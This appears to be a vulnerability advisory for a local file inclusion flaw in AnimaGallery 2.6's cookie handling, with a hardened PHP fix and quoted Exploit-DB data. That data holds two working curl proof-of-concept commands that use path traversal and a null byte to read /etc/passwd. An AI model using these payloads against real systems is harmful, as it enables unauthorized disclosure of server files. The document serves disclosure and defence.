Vendor: AnimaGallery
By: Anonymous
CVSS: 7.5 (HIGH)
Title: Local File Include Vulnerability
CWE: 98
Product Name: AnimaGallery
Affected Version From: 2.6
Affected Version To: 2.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: CentOS 6.5, PHP 5.3.2, magic_quotes_gpc=off
Year: 2015

AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability

AnimaGallery 2.6 is vulnerable to Local File Inclusion because the values of the 'theme' and 'lang' cookies are used to build include() paths in func.php without any taint checking. An attacker who sends a crafted cookie can make the application include arbitrary local files, which can lead to the disclosure of sensitive information.

Mitigation:

The application should validate (taint check) the 'theme' and 'lang' cookie values before they are used to build include paths, so that crafted input is rejected instead of being processed.
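As an added illustration of that mitigation, written for this page and not taken from the advisory or from AnimaGallery's own code, here is a hardened replacement for the import_theme_lang() function quoted from func.php in the Exploit-DB data below. It keeps the original constants (DEFAULT_THEME, DEFAULT_LANG, THEME_LOCKED, LANG_LOCKED); the safe_name() helper is an assumption.

```php
<?php
// Added example, not AnimaGallery's code: a hardened import_theme_lang().
// The constants are the ones the original function uses; safe_name() is
// a helper introduced here for illustration.

// Accept only a short identifier of letters, digits, underscore and hyphen.
// This rejects '../', '/', '\0' and anything else that could change the
// include path, instead of trying to strip bad characters out of the value.
function safe_name($value)
{
    return is_string($value)
        && preg_match('/^[A-Za-z0-9_-]{1,32}$/', $value) === 1;
}

function import_theme_lang()
{
    $THEME = DEFAULT_THEME;
    // Validate the cookie value before touching the filesystem with it.
    if (!THEME_LOCKED
        && isset($_COOKIE['theme'])
        && safe_name($_COOKIE['theme'])
        && is_file('themes/' . $_COOKIE['theme'] . '/templates.php')) {
        $THEME = $_COOKIE['theme'];
    }

    $LANG = DEFAULT_LANG;
    // The original already called file_exists() for 'lang', yet the PoC
    // still works because the trailing %00 truncates the path before '.php'
    // on the tested PHP version. Checking the name first closes that gap;
    // a null byte can never reach is_file() because safe_name() runs first.
    if (!LANG_LOCKED
        && isset($_COOKIE['lang'])
        && safe_name($_COOKIE['lang'])
        && is_file('languages/' . $_COOKIE['lang'] . '.php')) {
        $LANG = $_COOKIE['lang'];
    }

    return array($THEME, $LANG);
}
```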

Exploit-DB raw data:

# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability
# Date: 2015/06/07 
# Vendor Homepage: http://dg.no.sapo.pt/ 
# Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip
# Version: 2.6
# Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off
# Category: webapps

* Description

func.php
line 21 - 22:

include('themes/'.$THEME.'/templates.php');
include('languages/'.$LANG.'.php');

$LANG and $THEME come from the import_theme_lang() function.

function import_theme_lang()
{
  $THEME = DEFAULT_THEME;
  if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
    $THEME = $_COOKIE['theme'];  // <--  Not Taint Checking

  $LANG = DEFAULT_LANG;
  if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
    $LANG = $_COOKIE['lang'];     // <--- Not Taint Checking

  return(array($THEME, $LANG));
}


* Proof of Concept

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"